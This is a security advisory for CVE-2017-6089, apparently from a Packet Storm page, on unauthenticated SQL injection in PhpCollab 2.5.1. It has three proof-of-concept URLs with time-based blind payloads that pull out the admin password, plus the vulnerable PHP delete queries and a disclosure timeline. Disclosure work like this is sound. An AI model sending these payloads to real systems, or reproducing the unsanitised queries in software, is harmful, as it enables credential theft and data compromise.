exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PhpCollab 2.5.1 SQL Injection

PhpCollab 2.5.1 SQL Injection
Posted Sep 29, 2017
Authored by Nicolas Serra

PhpCollab versions 2.5.1 and below suffer from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
advisories | CVE-2017-6089
SHA-256 | 60393ffbba4cf77640d0495ff1ac04b03ec23c7c5d69c624bbad0ff95a134795

PhpCollab 2.5.1 SQL Injection

Change Mirror Download
# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated)

## Description

PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.

## SQL injections

The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user.

**CVE ID**: CVE-2017-6089

**Access Vector**: remote

**Security Risk**: Critical

**Vulnerability**: CWE-89

**CVSS Base Score**: 10 (Critical)

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H

## Proof of Concept 1

The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter (it requires at least one topic):

```
http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2

http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))
```

### Vulnerable code

The vulnerable code is found in `topics/deletetopics.php`, line 9.

```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id";
$tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id";
$pieces = explode(",",$id);
$num = count($pieces);
connectSql("$tmpquery1");
connectSql("$tmpquery2");
```


## Proof of Concept 2

The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark):

```
http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```

### Vulnerable code

The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32.

```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```


## Proof of Concept 3

The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry):

```
http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)
```

### Vulnerable code

The vulnerable code is found in `calendar/deletecalendar.php`, line 31.

```
if ($action == "delete") {
$id = str_replace("**",",",$id);
$tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)";
connectSql("$tmpquery1");
```

**Notes**
The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters.


## Solution

Update to the latest version avalaible.

## Affected versions

* Version <= 2.5.1

## Timeline (dd/mm/yyyy)

* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.

## Credits

* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)

--
SYSDREAM Labs <labs@sysdream.com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close